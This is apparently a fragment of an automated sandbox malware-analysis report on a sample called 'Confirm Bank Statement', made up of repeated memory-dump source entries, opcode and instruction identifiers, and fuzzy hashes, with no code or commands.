                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3718693176.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_a7d000_Confirm Bank Statement.jbxd
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6911f1d638744264e19583e2fa4d4eaa7d87a259c48ca8ef513625d4a50c2fc
                                                                                              • Instruction ID: 13df90233a2b063479eaeb404fdc4a75ff242b818396fd757da3793f69200073
                                                                                              • Opcode Fuzzy Hash: e6911f1d638744264e19583e2fa4d4eaa7d87a259c48ca8ef513625d4a50c2fc
                                                                                              • Instruction Fuzzy Hash: 89C1B478E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b09c20e3797a2502f9b5b443f2d09f0e4f95357a9c13239a637befc8457fe24
                                                                                              • Instruction ID: 68bff4cddd0218969923840e9063b351869093653e0a97f354ed7a0e25a7b0c8
                                                                                              • Opcode Fuzzy Hash: 6b09c20e3797a2502f9b5b443f2d09f0e4f95357a9c13239a637befc8457fe24
                                                                                              • Instruction Fuzzy Hash: 1EC1A378E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 22b0afb01b8a0ebaedef9b9afc8d500be6e34fbf3b5a307cdafda488685466fe
                                                                                              • Instruction ID: 9d4cfbf63decc7133c5c5ff12e874686912d2b82e059fdb0de04927f91bde4e4
                                                                                              • Opcode Fuzzy Hash: 22b0afb01b8a0ebaedef9b9afc8d500be6e34fbf3b5a307cdafda488685466fe
                                                                                              • Instruction Fuzzy Hash: 37C1B378E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 95274f8c1809495dc03b9d36e21723a589663866d23164938103c903c09cd022
                                                                                              • Instruction ID: bf051eefcebfd39f676ba48c3a50a17daed1328bd50cb74040b35ee3a2f667ac
                                                                                              • Opcode Fuzzy Hash: 95274f8c1809495dc03b9d36e21723a589663866d23164938103c903c09cd022
                                                                                              • Instruction Fuzzy Hash: 8EC1A478E01218CFDB14DFA9C995B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 275f3e14c5428d544b6ffd8118ac308ee57c36da7cfb39c1d2f9aec93f13f4d5
                                                                                              • Instruction ID: 025dd50a818420cb04ebb1dffc030bb17c1f7c43316054cdf357332cfc4a5d36
                                                                                              • Opcode Fuzzy Hash: 275f3e14c5428d544b6ffd8118ac308ee57c36da7cfb39c1d2f9aec93f13f4d5
                                                                                              • Instruction Fuzzy Hash: D7C1B378E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6144baf5fa6e50ba8670d7d4682a78e34d6a4c9f1fcdca353e0ac3eca4d48924
                                                                                              • Instruction ID: 4ff426639183b01db7a42071bab84ed4d03ad295980f342dbc162ee2007d8f66
                                                                                              • Opcode Fuzzy Hash: 6144baf5fa6e50ba8670d7d4682a78e34d6a4c9f1fcdca353e0ac3eca4d48924
                                                                                              • Instruction Fuzzy Hash: 9BC1C378E01218DFDB14DFA9C945B9DBBB2BF88300F2081A9D809AB355DB359E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd908ab9d5b4cd4296bad7c81a767feaa60e2f19552ab2127e2555193d4f3975
                                                                                              • Instruction ID: 7559c3b413b5ca64d5e25eb85220b71a29433892ac01c0d20dd6bdd557e512b9
                                                                                              • Opcode Fuzzy Hash: dd908ab9d5b4cd4296bad7c81a767feaa60e2f19552ab2127e2555193d4f3975
                                                                                              • Instruction Fuzzy Hash: 5BC1B378E01218CFDB14DFA9C955B9DBBB2BF89304F2080A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56e357744cdf905666b9347db28698640a17a31f52cd0ef0fca34f1d48aa1f87
                                                                                              • Instruction ID: a9b4f4f8eb160034be092f0995395e42376b0b1f7a6384b524fbfd0572dd51f8
                                                                                              • Opcode Fuzzy Hash: 56e357744cdf905666b9347db28698640a17a31f52cd0ef0fca34f1d48aa1f87
                                                                                              • Instruction Fuzzy Hash: 48C1C378E00218CFDB14DFA9C945B9DBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f42c784e4a28791bd9206576b3a81223190bfa4ac15f5d56a86067dda17ee61e
                                                                                              • Instruction ID: f0810c0284a7ee9e95f3010388af976ec71b95d83aca158408ce8322644d6581
                                                                                              • Opcode Fuzzy Hash: f42c784e4a28791bd9206576b3a81223190bfa4ac15f5d56a86067dda17ee61e
                                                                                              • Instruction Fuzzy Hash: 2CC1C378E01218CFDB14DFA9C955B9DBBB2BF89301F1080A9D809AB395DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2dc850cc3bc96f056be26b3d334b42d8b96ff601a80f7bdae78ca132c2ff2e85
                                                                                              • Instruction ID: 38b476f5712e601b26a73ec4c16f89bf0adb77906f575cd8d4d011584ef0ba0b
                                                                                              • Opcode Fuzzy Hash: 2dc850cc3bc96f056be26b3d334b42d8b96ff601a80f7bdae78ca132c2ff2e85
                                                                                              • Instruction Fuzzy Hash: 89C1C478E01218CFDB14DFA9C944B9DBBB2BF89300F2081A9D809AB355DB359E85CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9be4323dc15ce10f7ebd4d059766c418ddf0e62b28e63d5ed2f71a67d3986026
                                                                                              • Instruction ID: 0a301553601ae198ff5717115a144742825d2bc658ff1d9050e2a0eb51daa436
                                                                                              • Opcode Fuzzy Hash: 9be4323dc15ce10f7ebd4d059766c418ddf0e62b28e63d5ed2f71a67d3986026
                                                                                              • Instruction Fuzzy Hash: EEC1B478E00218CFDB14DFA9C955B9DBBB2BF89304F1081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f75097eb4ae218b4e5a75fd62bc59561f17e5c0d4fa4dad34c3d443b3e52561f
                                                                                              • Instruction ID: 7109957df76b4985f564840fcc8b412270a80a223bb80139f2b8566500e08cc7
                                                                                              • Opcode Fuzzy Hash: f75097eb4ae218b4e5a75fd62bc59561f17e5c0d4fa4dad34c3d443b3e52561f
                                                                                              • Instruction Fuzzy Hash: FBC1A278E01218CFDB14DFA9C954B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 91846db3cee2df181f3fedc46e0617169be1e0566f793ca632157caea607d9b9
                                                                                              • Instruction ID: 6140592988f55175f897a039db52179590c513ef9802fbcd4cfc1b6cf1562ef9
                                                                                              • Opcode Fuzzy Hash: 91846db3cee2df181f3fedc46e0617169be1e0566f793ca632157caea607d9b9
                                                                                              • Instruction Fuzzy Hash: ECC1B378E01218CFDB14DFA9C955B9DBBB2BF89300F1081A9D809AB395DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f63b914c5347af5421ac90cba95d3ab69c50391c7e4ab91a4a8be6831706143
                                                                                              • Instruction ID: 25dbcaa15115389c90d81fe27136024906baffff7439763af9fb287f5b5df0b8
                                                                                              • Opcode Fuzzy Hash: 9f63b914c5347af5421ac90cba95d3ab69c50391c7e4ab91a4a8be6831706143
                                                                                              • Instruction Fuzzy Hash: FEC1C478E01218CFDB14DFA9C985B9DBBB2BF89300F1080A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 716e52c194bd12a7e152c1886b1aadc14aa9bbf28fabed0d1f234292b9668f44
                                                                                              • Instruction ID: 85d8b201d9b80c664c5d833f81885547374085fe96b64e98db04bee197b4e643
                                                                                              • Opcode Fuzzy Hash: 716e52c194bd12a7e152c1886b1aadc14aa9bbf28fabed0d1f234292b9668f44
                                                                                              • Instruction Fuzzy Hash: 54C1B478E01218CFDB14DFA9C955B9DBBB2BF89300F1081AAD809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f692c50912247cd75d92dd9719dc401afe1d5bad414f1cbb0c1ce62a7cbc6c12
                                                                                              • Instruction ID: 0e982c6bf47f77f65a26107f961e23574204915fec5e1fd71ac5fcbb4d6658ef
                                                                                              • Opcode Fuzzy Hash: f692c50912247cd75d92dd9719dc401afe1d5bad414f1cbb0c1ce62a7cbc6c12
                                                                                              • Instruction Fuzzy Hash: BAC1C378E01218CFDB14DFA9C954B9DBBB2BF88301F2081A9D809AB355DB359E85CF50
                                                                                              Memory Dump Source
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq$(oq$(oq$(oq
                                                                                              • API String ID: 0-3853041632